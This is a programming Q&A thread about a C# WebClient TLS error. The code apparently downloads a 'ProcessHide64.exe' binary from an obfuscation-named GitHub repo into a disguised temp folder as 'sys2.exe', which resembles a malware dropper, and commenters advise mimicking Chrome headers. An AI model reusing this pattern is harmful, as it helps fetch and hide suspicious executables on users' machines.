# WebClient Excepation The underlying connection was closed: An unexpected error occurred on a send | .NET 2.0

Tags: c#, .net, webclient

i'm coding a new project and i stack in making a webClient thats download file to disk
my code is

```
string Temp = Path.GetTempPath();
        Directory.CreateDirectory(Temp + "\\RE1port.CC0866C1-44DA-4B60-9556-C7C70E5066E12");
        WebClient Client = new WebClient();
        ServicePointManager.SecurityProtocol = SecurityProtocolType.Tls | SecurityProtocolType.Ssl3;
         Client.Headers.Add("user-agent", "Mozilla");
        Client.DownloadFile(new Uri("https://github.com/MohammedZr/enchantress/blob/master/MrO_bscure/ProcessHide64.exe?raw=true"), Temp + "\\RE1port.CC0866C1-44DA-4B60-9556-C7C70E5066E12" + "\\sys2.exe");
```

Comment: Put your URL into chrome and verify the URL is correct.  All I can tell is the connection is not completing.  Not sure if the URL is wrong or a settings is wrong.

Comment: no the URL is working ?

Comment: I would try using a different user agent.  You can use a sniffer to verify what user agent is being used with working Chrome.  See : https://developers.whatismybrowser.com/useragents/explore/software_name/chrome/

Comment: any Help Guys !?

Comment: You have to find out the differences in first request between the Chrome Headers and the c# application using a sniffer.  Make the c# application header look like the Chrome headers.